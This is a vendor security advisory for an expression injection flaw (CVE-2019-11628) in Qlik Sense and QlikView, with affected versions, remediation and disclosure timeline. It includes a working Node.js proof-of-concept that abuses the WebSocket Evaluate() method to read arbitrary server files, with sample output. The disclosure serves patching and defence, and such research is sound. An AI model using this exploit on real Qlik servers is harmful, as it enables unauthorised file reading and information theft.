Trustwave SpiderLabs Security Advisory TWSL2019-004: Expression Injection Vulnerability in Qlik Products Published: 06/04/2019 Version: 1.0 Vendor: Qlik (https://www.qlik.com/) Products: Qlik Sense Enterprise, QlikView Server, Qlik Analytics Platform Versions affected: QlikView Server prior to 11.20 SR19, 12.00 (end of life), 12.10 SR11, 12.20 SR9, 12.30 SR2 Qlik Sense Enterprise and Qlik Analytics Platform versions prior to February 2018 Patch 4, April 2018 Patch 3, June 2018 Patch 3,September 2018 Patch 4, November 2018 Patch 4, February 2019 Patch 2 and/or any 2017 version and prior. Product description: Qlik is an end-to-end data analytics platform. Finding: Expression Injection Credit: Olga Barinova of Trustwave CVE: CVE-2019-11628 Description: The Qlik Sense application allows the use of the 'Evaluate()' method via WebSockets. 'Evaluate()' is the method which executes the expression on the server and returns the result.An expression can be a simple arithmetic operation or a complex expression with system functions and system variables. Expression execution may lead to: - arbitrary file read - arbitrary DB file read - system information disclosure - server-side request forgery - and other vulnerabilities The following JS script connects to the application and sends the message with the payload to read the "C:/ProgramData/foo/readme.txt" file on the server. ## $ cat qlikexploit.js const W3CWebSocket = require('websocket').w3cwebsocket const WebSocket = require('websocket-as-promised') let payload = `'$(Include="C:/ProgramData/foo/readme.txt")'` let requestId = 0 async function main(){ const ws = new WebSocket('wss://a.b.c.d/app/', { createWebSocket: url => new W3CWebSocket(url), packMessage: data => JSON.stringify(data), unpackMessage: message => JSON.parse(message), attachRequestId: (data, requestId) => Object.assign({ id: requestId }, data), extractRequestId: data => data && data.id }) async function send (method, params, handle) { requestId++ let message = await ws.sendRequest( { method, params, handle, delta: true, jsonrpc: 2.0 }, { requestId } ) if (message.error) throw 'Error calling method: ' + method + ' ' + message.error.message return message.result } await ws.open() let result = await send('GetDocList', [], -1) console.log(result) let docId = result.qDocList[0].value[0].qDocId result = await send('OpenDoc',[ docId, '', '', '', false ],-1) console.log(result) result = await send('Evaluate',[payload], 1) console.log(result) console.log('\nExploit result: ' + result.qReturn[0].value) await ws.close() } main() ## $ node qlikexploit.js { qDocList: [ { op: 'add', path: '/', value: [Array] } ] } { qReturn: [ { op: 'add', path: '/', value: [Object] } ] } { qReturn: [ { op: 'add', path: '/', value: 'This is the file contents in C:/ProgramData/foo/readme.txt\r\n' } ] } Exploit result: This is the file contents in C:/ProgramData/foo/readme.txt By changing the payload variable, it's possible to read all other files as well as some system information such as computer name, OS user, document path, etc. Remediation Steps: QlikView Server: Upgrade to the latest stable release or at least 11.20 SR19, 12.10 SR11, 12.20 SR9 or 12.30 SR2. Qlik Sense Enterprise / Qlik Analytics Platform: Upgrade to the latest stable release or at least February 2018 Patch 4, April 2018 Patch 3, June 2018 Patch 3, September 2018 Patch 4, November 2018 Patch 4 or February 2019 Patch 2 Revision History: 03/20/2019 - Vulnerability disclosed to vendor 04/16/2019 - Patch released by vendor 06/04/2019 - Advisory published References 1. https://qliksupport.force.com/articles/000069985 About Trustwave: Trustwave helps businesses fight cybercrime, protect data and reduce security risk. With cloud and managed security services, integrated technologies and a team of security experts, ethical hackers and researchers, Trustwave enables businesses to transform the way they manage their information security and compliance programs. More than three million businesses are enrolled in the Trustwave TrustKeeper® cloud platform, through which Trustwave delivers automated, efficient and cost-effective threat, vulnerability and compliance management. Trustwave is headquartered in Chicago, with customers in 96 countries. For more information about Trustwave, visit https://www.trustwave.com. About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.